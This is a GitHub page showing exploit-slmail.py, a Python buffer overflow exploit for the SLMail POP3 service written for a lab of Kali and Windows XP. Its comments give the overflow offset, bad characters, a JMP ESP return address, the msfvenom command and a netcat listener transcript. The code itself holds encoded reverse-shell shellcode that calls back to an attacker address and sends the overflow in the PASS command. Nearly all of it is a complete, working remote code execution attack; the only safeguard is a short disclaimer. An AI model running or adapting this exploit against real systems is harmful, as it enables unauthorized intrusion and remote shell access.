-
Notifications
You must be signed in to change notification settings - Fork 3
/
exploit-slmail.py
80 lines (74 loc) · 3.2 KB
/
exploit-slmail.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
#!/usr/bin/python
#
# July 2017 | github.com/rafaveira3
#
# Exploit SLMail - Buffer Overflow
#
# How I tested it:
# - 1 Kali attacking machine and 1 Windows XP (Metasploitable will do) in the same local host network using virtualbox.
# - Download and install vulnerable service on Windows XP (WARNING! THIS IS A VULNERABLE SERVICE)
# https://www.exploit-db.com/apps/12f1ab027e5374587e7e998c00682c5d-SLMail55_4433.exe
# - Intallation Guide: Next, Next, Next, ... , Next, Finish
# - pattern_create.rb and pattern_offset.rb = 2606
# - Bachars = \x00\x0a\x0d
# - Return Address found at 5F4A358F (JMP ESP)
# - Generated the payload using msfvenom
#
# PoC:
# terminal 1
# root@kali: python exploit-smail.py
# terminal 2
# root@kali: nc -nlvp 443
# listening on [any] 443 ...
# connect to [10.10.0.20] from (UNKNOWN) [10.10.0.21] 1035
# Microsoft Windows XP [vers�o 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Arquivos de programas\SLmail\System>
#
# Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems.
# Accessing a computer system or network without authorization or explicit permission is illegal.
#
#
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
jmpESP = "\x8f\x35\x4a\x5f"
nop = "\x90"*16
#
# msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.0.20 LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
# Payload size: 351 bytes
shellcode = ("\xbf\xbc\xfc\x4b\xdd\xdb\xd5\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
"\x52\x31\x7a\x12\x03\x7a\x12\x83\x7e\xf8\xa9\x28\x82\xe9\xac"
"\xd3\x7a\xea\xd0\x5a\x9f\xdb\xd0\x39\xd4\x4c\xe1\x4a\xb8\x60"
"\x8a\x1f\x28\xf2\xfe\xb7\x5f\xb3\xb5\xe1\x6e\x44\xe5\xd2\xf1"
"\xc6\xf4\x06\xd1\xf7\x36\x5b\x10\x3f\x2a\x96\x40\xe8\x20\x05"
"\x74\x9d\x7d\x96\xff\xed\x90\x9e\x1c\xa5\x93\x8f\xb3\xbd\xcd"
"\x0f\x32\x11\x66\x06\x2c\x76\x43\xd0\xc7\x4c\x3f\xe3\x01\x9d"
"\xc0\x48\x6c\x11\x33\x90\xa9\x96\xac\xe7\xc3\xe4\x51\xf0\x10"
"\x96\x8d\x75\x82\x30\x45\x2d\x6e\xc0\x8a\xa8\xe5\xce\x67\xbe"
"\xa1\xd2\x76\x13\xda\xef\xf3\x92\x0c\x66\x47\xb1\x88\x22\x13"
"\xd8\x89\x8e\xf2\xe5\xc9\x70\xaa\x43\x82\x9d\xbf\xf9\xc9\xc9"
"\x0c\x30\xf1\x09\x1b\x43\x82\x3b\x84\xff\x0c\x70\x4d\x26\xcb"
"\x77\x64\x9e\x43\x86\x87\xdf\x4a\x4d\xd3\x8f\xe4\x64\x5c\x44"
"\xf4\x89\x89\xcb\xa4\x25\x62\xac\x14\x86\xd2\x44\x7e\x09\x0c"
"\x74\x81\xc3\x25\x1f\x78\x84\x43\xea\x82\x40\x3c\xe8\x82\x69"
"\x07\x65\x64\x03\x67\x20\x3f\xbc\x1e\x69\xcb\x5d\xde\xa7\xb6"
"\x5e\x54\x44\x47\x10\x9d\x21\x5b\xc5\x6d\x7c\x01\x40\x71\xaa"
"\x2d\x0e\xe0\x31\xad\x59\x19\xee\xfa\x0e\xef\xe7\x6e\xa3\x56"
"\x5e\x8c\x3e\x0e\x99\x14\xe5\xf3\x24\x95\x68\x4f\x03\x85\xb4"
"\x50\x0f\xf1\x68\x07\xd9\xaf\xce\xf1\xab\x19\x99\xae\x65\xcd"
"\x5c\x9d\xb5\x8b\x60\xc8\x43\x73\xd0\xa5\x15\x8c\xdd\x21\x92"
"\xf5\x03\xd2\x5d\x2c\x80\xe2\x17\x6c\xa1\x6a\xfe\xe5\xf3\xf6"
"\x01\xd0\x30\x0f\x82\xd0\xc8\xf4\x9a\x91\xcd\xb1\x1c\x4a\xbc"
"\xaa\xc8\x6c\x13\xca\xd8")
buffer = "A"*2606 + jmpESP + nop + shellcode + "C"*(3500-2606-4-351-16)
try:
print "\nSending evil buffer..."
s.connect(('10.10.0.21',110))
data = s.recv(1024)
s.send('USER username' +'\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
print "\nDone!."
except:
print "Could not connect to POP3!"